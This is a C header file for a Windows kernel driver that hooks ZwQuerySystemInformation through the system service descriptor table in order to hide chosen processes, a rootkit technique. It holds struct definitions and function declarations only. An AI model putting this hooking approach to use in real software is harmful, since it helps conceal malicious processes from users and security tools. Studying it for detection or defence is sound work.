winhook.h

一个驱动版的隐藏进程的代码。。。。。。。。。。。。

/* ******************************************************************
	Name:WinHook.c
	
	Hook System Service Call In Windows 2000 or later version,Only 
for x86 CPU.This Driver Only hide process that you setting!
		
	Copyright (C) ndis 2004, All rights reserved.
****************************************************************** */

/* Include ntddk standard header with C linkage*/
#ifdef __cplusplus
extern "C"
{
#endif

#include		<stdarg.h>
#include		<stdio.h>

#define	FILE_DEVICE_WINHOOK    0x00009122

/* Native API process/threads struct */
struct _SYSTEM_THREADS
{
   LARGE_INTEGER    KernelTime;
   LARGE_INTEGER    UserTime;
   LARGE_INTEGER    CreateTime;
   ULONG            WaitTime;
   PVOID            StartAddress;
   CLIENT_ID        ClientIs;
   KPRIORITY        Priority;
   KPRIORITY        BasePriority;
   ULONG            ContextSwitchCount;
   ULONG            ThreadState;
   KWAIT_REASON     WaitReason;
};

struct _SYSTEM_PROCESSES
{
   ULONG            NextEntryDelta;
   ULONG            ThreadCount;
   ULONG            Reserved[6];
   LARGE_INTEGER    CreateTime;
   LARGE_INTEGER    UserTime;
   LARGE_INTEGER    KernelTime;
   UNICODE_STRING   ProcessName;
   KPRIORITY        BasePriority;
   ULONG            ProcessId;
   ULONG            InheritedFromProcessId;
   ULONG            HandleCount;
   ULONG            Reserved2[2];
   VM_COUNTERS      VmCounters;
   IO_COUNTERS      IoCounters;
   struct _SYSTEM_THREADS Threads[1];
};

/* Definition for system call service table */
typedef struct _SRVTABLE {
	PVOID				 *ServiceTable;
	ULONG           LowCall;        
	ULONG           HiCall;
	PVOID				 *ArgTable;
} SRVTABLE, *PSRVTABLE;

/* Old ZwQuerySystemInformation */
NTSTATUS	(*RealZwQuerySystemInformation)(
					IN		ULONG  SystemInformationClass,
					IN		PVOID  SystemInformation,
					IN		ULONG  SystemInformationLength, 
					OUT	PULONG ReturnLength
			);	

/* Native API ZwQuerySystemInformation */
NTSYSAPI	NTSTATUS  NTAPI ZwQuerySystemInformation(
					IN  ULONG  SystemInformationClass,
					IN  PVOID  SystemInformation,
					IN  ULONG  SystemInformationLength,
					OUT PULONG ReturnLength
				);

/* Install System Call Hook */
VOID	  HookSystemCall();

/* Uninstall System Call Hook */
VOID	  UnhookSystemCall();

/* ook ZwQuerySystemInformation */
NTSTATUS  HookZwQuerySystemInformation( 
					IN  ULONG  SystemInformationClass, 
					IN  PVOID  SystemInformation, 
					IN  ULONG  SystemInformationLength, 
					OUT PULONG ReturnLength
		  );

/* Driver Entry */
NTSTATUS  DriverEntry(
					IN	PDRIVER_OBJECT	 DriverObject,
					IN	PUNICODE_STRING RegistryPath
		  );

/* Driver Dispatch */
NTSTATUS  DriverDispatch(
					IN		PDEVICE_OBJECT DeviceObject,
					IN		PIRP				Irp
		  );

/* Unload Driver*/
VOID	  DriverUnload(
		         IN PDRIVER_OBJECT	 DriverObject
		  );

/* Pointer to the image of the system service table */
extern PSRVTABLE KeServiceDescriptorTable;

#ifdef __cplusplus
}
#endif